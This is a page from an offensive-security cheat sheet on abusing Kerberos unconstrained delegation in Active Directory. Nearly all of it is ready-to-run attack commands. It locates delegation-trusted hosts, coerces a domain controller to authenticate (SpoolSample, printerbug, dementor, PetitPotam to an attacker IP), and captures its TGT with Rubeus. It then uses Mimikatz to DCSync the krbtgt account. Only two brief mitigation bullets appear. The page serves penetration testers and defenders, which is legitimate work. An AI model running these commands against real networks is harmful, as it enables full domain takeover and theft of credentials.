kerberos-delegation-unconstrained.md (5668B)
1 --- 2 title: "Kerberos Delegation - Unconstrained Delegation" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/kerberos-delegation-unconstrained.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/kerberos-delegation-unconstrained.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Kerberos Delegation - Unconstrained Delegation 12 13 > The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. 14 > When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory. 15 16 :warning: Unconstrained delegation used to be the only option available in Windows 2000 17 18 > **Warning** 19 > Remember to coerce to a HOSTNAME if you want a Kerberos Ticket 20 21 ## SpoolService Abuse with Unconstrained Delegation 22 23 The goal is to gain DC Sync privileges using a computer account and the SpoolService bug. 24 25 **Requirements**: 26 27 - Object with Property **Trust this computer for delegation to any service (Kerberos only)** 28 - Must have **ADS_UF_TRUSTED_FOR_DELEGATION** 29 - Must not have **ADS_UF_NOT_DELEGATED** flag 30 - User must not be in the **Protected Users** group 31 - User must not have the flag **Account is sensitive and cannot be delegated** 32 33 ### Find delegation 34 35 :warning: : Domain controllers usually have unconstrained delegation enabled. 36 Check the `TRUSTED_FOR_DELEGATION` property. 37 38 - [ADModule](https://github.com/samratashok/ADModule) 39 40 ```powershell 41 # From https://github.com/samratashok/ADModule 42 PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True} 43 ``` 44 45 - [bloodyAD](https://github.com/CravateRouge/bloodyAD) 46 47 ```ps1 48 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))' --attr sAMAccountName,userAccountControl 49 ``` 50 51 - [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) 52 53 ```powershell 54 $> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10 55 grep TRUSTED_FOR_DELEGATION domain_computers.grep 56 ``` 57 58 - [netexec module](https://github.com/Pennyw0rth/NetExec/wiki) 59 60 ```powershell 61 nxc ldap 10.10.10.10 -u username -p password --trusted-for-delegation 62 ``` 63 64 - BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c` 65 - Powershell Active Directory module: `Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl` 66 67 ### SpoolService status 68 69 Check if the spool service is running on the remote host 70 71 ```powershell 72 ls \\dc01\pipe\spoolss 73 python rpcdump.py DOMAIN/user:password@10.10.10.10 74 ``` 75 76 ### Monitor with Rubeus 77 78 Monitor incoming connections from Rubeus. 79 80 ```powershell 81 Rubeus.exe monitor /interval:1 82 ``` 83 84 ### Force a connect back from the DC 85 86 Due to the unconstrained delegation, the TGT of the computer account (DC$) will be saved in the memory of the computer with unconstrained delegation. By default the domain controller computer account has DCSync rights over the domain object. 87 88 > SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface. 89 90 ```powershell 91 # From https://github.com/leechristensen/SpoolSample 92 .\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME 93 .\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB 94 # DC01.HACKER.LAB is the domain controller we want to compromise 95 # HELPDESK.HACKER.LAB is the machine with delegation enabled that we control. 96 97 # From https://github.com/dirkjanm/krbrelayx 98 printerbug.py 'domain/username:password'@<VICTIM-DC-NAME> <UNCONSTRAINED-SERVER-DC-NAME> 99 100 # From https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#gistcomment-2773689 101 python dementor.py -d domain -u username -p password <UNCONSTRAINED-SERVER-DC-NAME> <VICTIM-DC-NAME> 102 ``` 103 104 If the attack worked you should get a TGT of the domain controller. 105 106 ### Load the ticket 107 108 Extract the base64 TGT from Rubeus output and load it to our current session. 109 110 ```powershell 111 .\Rubeus.exe asktgs /ticket:<ticket base64> /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt 112 ``` 113 114 Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets` 115 116 Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HACKER\krbtgt` 117 118 ### Mitigation 119 120 - Ensure sensitive accounts cannot be delegated 121 - Disable the Print Spooler Service 122 123 ## MS-EFSRPC Abuse with Unconstrained Delegation 124 125 Using `PetitPotam`, another tool to coerce a callback from the targeted machine, instead of `SpoolSample`. 126 127 ```bash 128 # Coerce the callback 129 git clone https://github.com/topotam/PetitPotam 130 python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP 131 python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP 132 133 # Extract the ticket 134 .\Rubeus.exe asktgs /ticket:<ticket base64> /ptt 135 ``` 136 137 ## References 138 139 - [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/) 140 - [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1) 141 - [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - Elad Shamir - 28 January 2019](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)